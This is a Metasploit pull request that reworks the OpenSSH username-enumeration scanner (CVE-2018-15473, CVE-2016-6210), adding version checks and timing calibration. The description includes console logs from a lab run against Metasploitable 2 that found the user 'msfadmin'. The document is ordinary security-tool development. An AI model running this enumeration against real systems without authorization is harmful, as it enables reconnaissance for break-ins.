### PR TITLE
ssh_enumusers: Update workspace

### DIFF
--- a/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
@@ -298,6 +298,30 @@ class MetasploitModule < Msf::Auxiliary
     super
   end
 
+  def check_banner_version(ip, banner)
+    return unless banner
+
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - SSH banner: #{Rex::Text.to_hex_ascii(banner.strip)}")
+    report_ssh_service(ip, rport, info: banner)
+    report_ssh_host(banner, ip, rport)
+
+    match = banner.match(/OpenSSH[_ ](\d+\.\d+)/i)
+    return unless match
+
+    version = Rex::Version.new(match[1])
+    max_version, cve = case action['Type']
+                       when :malformed_packet then ['7.6', 'CVE-2018-15473']
+                       when :timing_attack then ['7.2', 'CVE-2016-6210']
+                       end
+
+    if version > Rex::Version.new(max_version)
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - OpenSSH #{match[1]} may NOT be vulnerable (#{action.name}/#{cve} affects <= #{max_version})")
+    else
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - OpenSSH #{match[1]} may be vulnerable to #{action.name}/#{cve}")
+      return "OpenSSH #{match[1]} <= #{max_version}, #{action.name}/#{cve}"
+    end
+  end
+
   def run_host(ip)
     banner = grab_ssh_banner(ip)
     if banner.nil?
@@ -305,6 +329,7 @@ class MetasploitModule < Msf::Auxiliary
       report_host(host: ip)
       return
     end
+    vuln_context = check_banner_version(ip, banner)
 
     calibrate_threshold(ip) if action['Type'] == :timing_attack
     print_warning("#{Rex::Socket.to_authority(rhost, rport)} - #{action.name} may be unreliable on low-latency networks (#{@calibrated_threshold}s)") if action['Type'] == :timing_attack && @calibrated_threshold && @calibrated_threshold < 3.0
@@ -318,8 +343,23 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     users = user_list
-
     print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting SSH username enumeration")
-    users.each { |user| show_result(attempt_user(user, ip), user, ip) }
+    found_users = users.select do |user|
+      result = attempt_user(user, ip)
+      show_result(result, user, ip)
+      result == :success
+    end
+
+    if vuln_context && !found_users.empty?
+      report_vuln(
+        host: ip,
+        port: rport,
+        proto: 'tcp',
+        sname: 'ssh',
+        name: name,
+        info: vuln_context,
+        refs: references
+      )
+    end
   end
 end

--- a/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
@@ -19,21 +19,27 @@ class MetasploitModule < Msf::Auxiliary
           This module uses a malformed packet or timing attack to enumerate users on
           an OpenSSH server.
 
-          The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST
-          packet using public key authentication (must be enabled) to enumerate users.
+          The Malformed Packet action (default) sends a malformed (corrupted)
+          SSH_MSG_USERAUTH_REQUEST packet using public key authentication
+          (which needs to be enabled server-side). OpenSSH <= 7.6 responds
+          differently for valid vs. invalid users, exposing their existence
+          (CVE-2018-15473).
 
-          On some versions of OpenSSH under some configurations, OpenSSH will return a
-          "permission denied" error for an invalid user faster than for a valid user,
-          creating an opportunity for a timing attack to enumerate users.
+          The Timing Attack action submits an oversized password via
+          keyboard-interactive or password authentication. OpenSSH <= 7.2
+          with UsePAM enabled returns 'permission denied' faster for invalid
+          users than valid ones, exposing their existence via timing
+          (CVE-2016-6210).
 
-          Testing note: invalid users were logged, while valid users were not. YMMV.
+          NOTE: Invalid users were logged server side, while valid users were not. YMMV.
         },
         'Author' => [
           'kenkeiras',     # Timing attack
           'Dariusz Tytko', # Malformed packet
           'Michal Sajdak', # Malformed packet
           'Qualys',        # Malformed packet
-          'wvu'            # Malformed packet
+          'wvu',           # Malformed packet
+          'g0tmi1k' # @g0tmi1k - additional features
         ],
         'References' => [
           ['CVE', '2003-0190'],
@@ -50,14 +56,14 @@ class MetasploitModule < Msf::Auxiliary
           [
             'Malformed Packet',
             {
-              'Description' => 'Use a malformed packet',
+              'Description' => 'Use a malformed packet (OpenSSH <= 7.6, CVE-2018-15473)',
               'Type' => :malformed_packet
             }
           ],
           [
             'Timing Attack',
             {
-              'Description' => 'Use a timing attack',
+              'Description' => 'Use a timing attack (OpenSSH <= 7.2, CVE-2016-6210)',
               'Type' => :timing_attack
             }
           ]

--- a/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
@@ -7,12 +7,14 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::SSH
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
+  include Msf::Module::Deprecated
+  moved_from 'auxiliary/scanner/ssh/ssh_enumusers'
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'SSH Username Enumeration',
+        'Name' => 'OpenSSH 7.6 And Earlier Username Enumeration',
         'Description' => %q{
           This module uses a malformed packet or timing attack to enumerate users on
           an OpenSSH server.

--- a/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
@@ -99,6 +99,11 @@ class MetasploitModule < Msf::Auxiliary
 
     register_advanced_options(
       [
+        OptInt.new('CALIBRATE_COUNT',
+                   [
+                     false, 'Number of random-username samples used to auto-calibrate ' \
+                     'the timing threshold (timing attack only, 0 to disable)', 5
+                   ]),
         OptInt.new('RETRY_NUM',
                    [
                      true, 'The number of attempts to connect to a SSH server' \
@@ -127,7 +132,26 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def threshold
-    datastore['THRESHOLD']
+    @calibrated_threshold || datastore['THRESHOLD']
+  end
+
+  def calibrate_threshold(ip)
+    sample_count = datastore['CALIBRATE_COUNT']
+    return if sample_count.zero?
+
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Calibrating timing threshold with #{sample_count} samples...")
+    times = Array.new(sample_count) do
+      user = Rex::Text.rand_text_alphanumeric(8..32)
+      t0 = Time.now
+      attempt_user(user, ip, label: '<calibrating>')
+      Time.now - t0
+    end
+
+    mean = times.sum / times.size
+    variance = times.sum { |t| (t - mean)**2 } / times.size
+    stddev = Math.sqrt(variance)
+    @calibrated_threshold = (mean + 2 * stddev).ceil(2)
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Calibrated threshold: #{@calibrated_threshold}s (mean: #{mean.round(2)}s, jitter: #{stddev.round(2)}s)")
   end
 
   # Returns true if a nonsense username appears active.
@@ -179,7 +203,9 @@ class MetasploitModule < Msf::Auxiliary
     when :malformed_packet
       return :success if ssh
     when :timing_attack
-      return :success if (finish_time - start_time > threshold)
+      elapsed = finish_time - start_time
+      vprint_status("User '#{user}' - #{elapsed.round(2)}s (threshold: #{threshold}s)")
+      return :success if elapsed > threshold
     end
 
     :fail
@@ -273,6 +299,9 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
+
+    calibrate_threshold(ip) if action['Type'] == :timing_attack
+    print_warning("#{Rex::Socket.to_authority(rhost, rport)} - #{action.name} may be unreliable on low-latency networks (#{@calibrated_threshold}s)") if action['Type'] == :timing_attack && @calibrated_threshold && @calibrated_threshold < 3.0
 
     if datastore['CHECK_FALSE']
       print_status("#{Rex::Socket.to_authority(rhost, rport)} - Checking for false positives")

--- a/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
@@ -133,7 +133,7 @@ class MetasploitModule < Msf::Auxiliary
   # Returns true if a nonsense username appears active.
   def check_false_positive(ip)
     user = Rex::Text.rand_text_alphanumeric(8..32)
-    attempt_user(user, ip) == :success
+    attempt_user(user, ip, label: '<random>') == :success
   end
 
   def check_user(ip, user, port)
@@ -170,7 +170,7 @@ class MetasploitModule < Msf::Auxiliary
     rescue Net::SSH::AuthenticationFailed
       return :fail if technique == :malformed_packet
     rescue Net::SSH::Exception => e
-      vprint_error("#{e.class}: #{e.message}")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - #{e.class}: #{e.message}")
     end
 
     finish_time = Time.new
@@ -212,12 +212,6 @@ class MetasploitModule < Msf::Auxiliary
     create_credential_login(login_data)
   end
 
-  # Because this isn't using the AuthBrute mixin, we don't have the
-  # usual peer method
-  def peer(rhost = nil)
-    "#{rhost}:#{rport} - SSH -"
-  end
-
   def user_list
     users = []
 
@@ -225,14 +219,16 @@ class MetasploitModule < Msf::Auxiliary
 
     if datastore['USER_FILE']
       fail_with(Failure::BadConfig, 'The USER_FILE is not readable') unless File.readable?(datastore['USER_FILE'])
-      users += File.read(datastore['USER_FILE']).split
+      file_users = File.read(datastore['USER_FILE']).split
+      vprint_status("Loaded #{file_users.size} users from #{datastore['USER_FILE']}")
+      users += file_users
     end
 
     if datastore['DB_ALL_USERS']
       if framework.db.active
-        framework.db.creds(workspace: myworkspace.name).each do |o|
-          users << o.public.username if o.public
-        end
+        db_users = framework.db.creds(workspace: myworkspace.name).filter_map { |o| o.public&.username }
+        vprint_status("Loaded #{db_users.size} users from database")
+        users += db_users
       else
         print_warning('No active DB -- The following option will be ignored: DB_ALL_USERS')
       end
@@ -241,14 +237,14 @@ class MetasploitModule < Msf::Auxiliary
     users.uniq
   end
 
-  def attempt_user(user, ip)
+  def attempt_user(user, ip, label: user)
     attempt_num = 0
     ret = nil
 
     while (attempt_num <= retry_num) && (ret.nil? || (ret == :connection_error))
       if attempt_num > 0
         Rex.sleep(2**attempt_num)
-        vprint_status("#{peer(ip)} Retrying '#{user}' due to connection error")
+        vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Retrying '#{label}' due to connection error")
       end
 
       ret = check_user(ip, user, rport)
@@ -261,37 +257,34 @@ class MetasploitModule < Msf::Auxiliary
   def show_result(attempt_result, user, ip)
     case attempt_result
     when :success
-      print_good("#{peer(ip)} User '#{user}' found")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - User '#{user}' found")
       do_report(ip, user, rport)
     when :connection_error
-      vprint_error("#{peer(ip)} User '#{user}' could not connect")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - User '#{user}' could not connect")
     when :fail
-      vprint_error("#{peer(ip)} User '#{user}' not found")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - User '#{user}' not found")
     end
   end
 
   def run
-    if user_list.empty?
-      fail_with(Failure::BadConfig, 'Please populate DB_ALL_USERS, USER_FILE, USERNAME')
-    end
+    fail_with(Failure::BadConfig, 'Please populate DB_ALL_USERS, USER_FILE and/or USERNAME') unless datastore['USERNAME'].present? || datastore['USER_FILE'] || datastore['DB_ALL_USERS']
 
     super
   end
 
   def run_host(ip)
-    print_status("#{peer(ip)} Using #{action.name.downcase} technique")
 
     if datastore['CHECK_FALSE']
-      print_status("#{peer(ip)} Checking for false positives")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Checking for false positives")
       if check_false_positive(ip)
-        print_error("#{peer(ip)} throws false positive results. Aborting.")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - False positive check failed as server returned valid for a random username")
         return
       end
     end
 
     users = user_list
 
-    print_status("#{peer(ip)} Starting scan")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting SSH username enumeration")
     users.each { |user| show_result(attempt_user(user, ip), user, ip) }
   end
 end

--- a/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
@@ -106,25 +106,10 @@ class MetasploitModule < Msf::Auxiliary
                    ]),
         OptInt.new('RETRY_NUM',
                    [
-                     true, 'The number of attempts to connect to a SSH server' \
-                   ' for each user', 3
-                   ]),
-        OptInt.new('SSH_TIMEOUT',
-                   [
-                     false, 'Specify the maximum time to negotiate a SSH session',
-                     10
-                   ]),
-        OptBool.new('SSH_DEBUG',
-                    [
-                      false, 'Enable SSH debugging output (Extreme verbosity!)',
-                      false
-                    ])
+                     true, 'The number of retries on connection error per user', 3
+                   ])
       ]
     )
-  end
-
-  def rport
-    datastore['RPORT']
   end
 
   def retry_num
@@ -154,7 +139,6 @@ class MetasploitModule < Msf::Auxiliary
     print_status("#{Rex::Socket.to_authority(rhost, rport)} - Calibrated threshold: #{@calibrated_threshold}s (mean: #{mean.round(2)}s, jitter: #{stddev.round(2)}s)")
   end
 
-  # Returns true if a nonsense username appears active.
   def check_false_positive(ip)
     user = Rex::Text.rand_text_alphanumeric(8..32)
     attempt_user(user, ip, label: '<random>') == :success
@@ -184,12 +168,12 @@ class MetasploitModule < Msf::Auxiliary
     start_time = Time.new
 
     begin
-      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
+      ssh = ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
         Net::SSH.start(ip, user, opts)
       end
     rescue Rex::ConnectionError
       return :connection_error
-    rescue Timeout::Error
+    rescue ::Timeout::Error
       return :success if technique == :timing_attack
     rescue Net::SSH::AuthenticationFailed
       return :fail if technique == :malformed_packet
@@ -215,10 +199,10 @@ class MetasploitModule < Msf::Auxiliary
     Rex::Text.rand_text_english(64_000..65_000)
   end
 
-  def do_report(ip, user, _port)
+  def do_report(ip, port, user)
     service_data = {
       address: ip,
-      port: rport,
+      port: port,
       service_name: 'ssh',
       protocol: 'tcp',
       workspace_id: myworkspace_id
@@ -284,7 +268,7 @@ class MetasploitModule < Msf::Auxiliary
     case attempt_result
     when :success
       print_good("#{Rex::Socket.to_authority(rhost, rport)} - User '#{user}' found")
-      do_report(ip, user, rport)
+      do_report(ip, rport, user)
     when :connection_error
       vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - User '#{user}' could not connect")
     when :fail
@@ -343,6 +327,8 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     users = user_list
+    return if users.empty?
+
     print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting SSH username enumeration")
     found_users = users.select do |user|
       result = attempt_user(user, ip)

--- a/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
+++ b/modules/auxiliary/scanner/ssh/openssh_enumusers.rb
@@ -299,6 +299,12 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
+    banner = grab_ssh_banner(ip)
+    if banner.nil?
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - No response (port closed or wrong service)")
+      report_host(host: ip)
+      return
+    end
 
     calibrate_threshold(ip) if action['Type'] == :timing_attack
     print_warning("#{Rex::Socket.to_authority(rhost, rport)} - #{action.name} may be unreliable on low-latency networks (#{@calibrated_threshold}s)") if action['Type'] == :timing_attack && @calibrated_threshold && @calibrated_threshold < 3.0


### PR DESCRIPTION
This PR does a few things:

- Rename the module as its only for OpenSSH (both actions)
- Use SSH mixin
- Add CALIBRATE_COUNT option, so able to auto-calibrate timing
- Improve output
  - e.g. Checks the OpenSSH version to vulnerable versions and gives feedback if it should/should not be vulnerable to attack/action

Target is Metasploitable 2.

```
        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  0      0         0      0      0      0
After : *        default  1      2         1      1      0      1
```

## Setup

Simple wordlists for users:

```console
$ cat << EOF > /tmp/users.txt
msfadmin
kali
incorrect
EOF
$ 
```

## Before

- Scanning ...anything always gave 0
- All testing was done using master branch

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use auxiliary/scanner/ssh/ssh_enumusers;
setg USER_FILE /tmp/users.txt;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] Setting default action Malformed Packet - view all 2 actions with the show actions command
USER_FILE => /tmp/users.txt

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHECK_FALSE   true             no        Check for false positives (random username)
   DB_ALL_USERS  false            no        Add all users in the current database to the list
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         22               yes       The target port
   THREADS       1                yes       The number of concurrent threads (max one per host)
   THRESHOLD     10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                       no        Single username to test (username spray)
   USER_FILE     /tmp/users.txt   no        File containing usernames, one per line


Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet



View the full module info with the info, or info -d command.

msf auxiliary(scanner/ssh/ssh_enumusers) >
```

```console
msf auxiliary(scanner/ssh/ssh_enumusers) > run RHOST=10.0.0.10 RPORT=9999
[*] 10.0.0.10:9999 - SSH - Using malformed packet technique
[*] 10.0.0.10:9999 - SSH - Checking for false positives
[*] 10.0.0.10:9999 - SSH - Retrying 'SG9ehCntRIxAbllSecQ' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'SG9ehCntRIxAbllSecQ' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'SG9ehCntRIxAbllSecQ' due to connection error
[*] 10.0.0.10:9999 - SSH - Starting scan
[*] 10.0.0.10:9999 - SSH - Retrying 'msfadmin' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'msfadmin' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'msfadmin' due to connection error
[-] 10.0.0.10:9999 - SSH - User 'msfadmin' could not connect
[*] 10.0.0.10:9999 - SSH - Retrying 'kali' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'kali' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'kali' due to connection error
[-] 10.0.0.10:9999 - SSH - User 'kali' could not connect
[*] 10.0.0.10:9999 - SSH - Retrying 'incorrect' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'incorrect' due to connection error
[*] 10.0.0.10:9999 - SSH - Retrying 'incorrect' due to connection error
[-] 10.0.0.10:9999 - SSH - User 'incorrect' could not connect
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf auxiliary(scanner/ssh/ssh_enumusers) >
```

```console
msf auxiliary(scanner/ssh/ssh_enumusers) > run RHOST=10.0.0.10 RPORT=21
[*] 10.0.0.10:21 - SSH - Using malformed packet technique
[*] 10.0.0.10:21 - SSH - Checking for false positives
[*] 10.0.0.10:21 - SSH - Starting scan
[-] 10.0.0.10:21 - SSH - User 'msfadmin' not found
[-] 10.0.0.10:21 - SSH - User 'kali' not found
[-] 10.0.0.10:21 - SSH - User 'incorrect' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf auxiliary(scanner/ssh/ssh_enumusers) >
```

```console
msf auxiliary(scanner/ssh/ssh_enumusers) > run RHOST=10.0.0.10
[*] 10.0.0.10:22 - SSH - Using malformed packet technique
[*] 10.0.0.10:22 - SSH - Checking for false positives
[*] 10.0.0.10:22 - SSH - Starting scan
[+] 10.0.0.10:22 - SSH - User 'msfadmin' found
[-] 10.0.0.10:22 - SSH - User 'kali' not found
[-] 10.0.0.10:22 - SSH - User 'incorrect' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         0      1      0      0

msf auxiliary(scanner/ssh/ssh_enumusers) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf auxiliary(scanner/ssh/ssh_enumusers) > services
Services
========

host       port  proto  name  state  info  resource  parents
----       ----  -----  ----  -----  ----  --------  -------
10.0.0.10  22    tcp    ssh   open         {}

msf auxiliary(scanner/ssh/ssh_enumusers) > creds
Credentials
===========

id   host       origin     service       public    private  realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------  -----  ------------  ----------  ----------------
570  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin

msf auxiliary(scanner/ssh/ssh_enumusers) >
```

```console
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf auxiliary(scanner/ssh/ssh_enumusers) > run RHOST=10.0.0.1
[*] 10.0.0.1:22 - SSH - Using malformed packet technique
[*] 10.0.0.1:22 - SSH - Checking for false positives
[-] 10.0.0.1:22 - SSH - throws false positive results. Aborting.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf auxiliary(scanner/ssh/ssh_enumusers) >
```



## After

- Scanning a valid host, but closed port: 1 host
- Scanning a valid host, open port, but incorrect: 1 host, 1 service
- All testing was done on this branch, with SSH mixin (https://github.com/rapid7/metasploit-framework/pull/21479) and auth_brute_mixin applied (https://github.com/rapid7/metasploit-framework/pull/21396)

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use auxiliary/scanner/ssh/openssh_enumusers;
setg USER_FILE /tmp/users.txt;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] Setting default action Malformed Packet - view all 2 actions with the show actions command
USER_FILE => /tmp/users.txt

Module options (auxiliary/scanner/ssh/openssh_enumusers):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHECK_FALSE   true             no        Check for false positives (random username)
   DB_ALL_USERS  false            no        Add all users in the current database to the list
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         22               yes       The target port
   THREADS       1                yes       The number of concurrent threads (max one per host)
   THRESHOLD     10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                       no        Single username to test (username spray)
   USER_FILE     /tmp/users.txt   no        File containing usernames, one per line


Auxiliary action:

   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet (OpenSSH <= 7.6, CVE-2018-15473)



View the full module info with the info, or info -d command.

msf auxiliary(scanner/ssh/openssh_enumusers) >
```

```console
msf auxiliary(scanner/ssh/openssh_enumusers) > run RHOST=10.0.0.10 RPORT=9999
[-] 10.0.0.10:9999 - No response (port closed or wrong service)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         0      0      0      0

msf auxiliary(scanner/ssh/openssh_enumusers) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf auxiliary(scanner/ssh/openssh_enumusers) >
```

```console
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf auxiliary(scanner/ssh/openssh_enumusers) > run RHOST=10.0.0.10 RPORT=21
[*] 10.0.0.10:21 - SSH banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Checking for false positives
[*] Loaded 3 users from /tmp/users.txt
[*] 10.0.0.10:21 - Starting SSH username enumeration
[*] 10.0.0.10:21 - User 'msfadmin' not found
[*] 10.0.0.10:21 - User 'kali' not found
[*] 10.0.0.10:21 - User 'incorrect' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         0      0      0      0

msf auxiliary(scanner/ssh/openssh_enumusers) > services
Services
========

host       port  proto  name  state  info                resource  parents
----       ----  -----  ----  -----  ----                --------  -------
10.0.0.10  21    tcp    ssh   open   220 (vsFTPd 2.3.4)  {}

msf auxiliary(scanner/ssh/openssh_enumusers) >
```

```console
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf auxiliary(scanner/ssh/openssh_enumusers) > run RHOST=10.0.0.10
[*] 10.0.0.10:22 - SSH banner: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] 10.0.0.10:22 - OpenSSH 4.7 may be vulnerable to Malformed Packet/CVE-2018-15473
[*] 10.0.0.10:22 - Checking for false positives
[*] Loaded 3 users from /tmp/users.txt
[*] 10.0.0.10:22 - Starting SSH username enumeration
[+] 10.0.0.10:22 - User 'msfadmin' found
[*] 10.0.0.10:22 - User 'kali' not found
[*] 10.0.0.10:22 - User 'incorrect' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/openssh_enumusers) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      1      0      1

msf auxiliary(scanner/ssh/openssh_enumusers) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Linux    Ubuntu     8.04   server

msf auxiliary(scanner/ssh/openssh_enumusers) > services
Services
========

host       port  proto  name  state  info                                   resource  parents
----       ----  -----  ----  -----  ----                                   --------  -------
10.0.0.10  22    tcp    ssh   open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1  {}        tcp (22/tcp)
10.0.0.10  22    tcp    tcp   open                                          {}

msf auxiliary(scanner/ssh/openssh_enumusers) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                                          References
---------                ----       -------       --------  ----                                          ----------
2026-05-26 20:23:00 UTC  10.0.0.10  ssh (22/tcp)  {}        OpenSSH 7.6 And Earlier Username Enumeration  CVE-2003-0190,CVE-2006-5229,CVE-2016-6210,CVE-2018-15473,OSVDB-32721,BID-20418,URL-https://seclists.
                                                                                                          org/oss-sec/2018/q3/124,URL-https://sekurak.pl/openssh-users-enumeration-cve-2018-15473/

msf auxiliary(scanner/ssh/openssh_enumusers) > creds
Credentials
===========

id   host       origin     service       public    private  realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------  -----  ------------  ----------  ----------------
572  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin

msf auxiliary(scanner/ssh/openssh_enumusers) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type     Data
 ----                     ----       -------  ----  --------  ----     ----
 2026-05-26 20:23:00 UTC  10.0.0.10  ssh      22    tcp       ssh.cpe  {:cpe=>"cpe:/o:canonical:ubuntu_linux:8.04"}

msf auxiliary(scanner/ssh/openssh_enumusers) >
```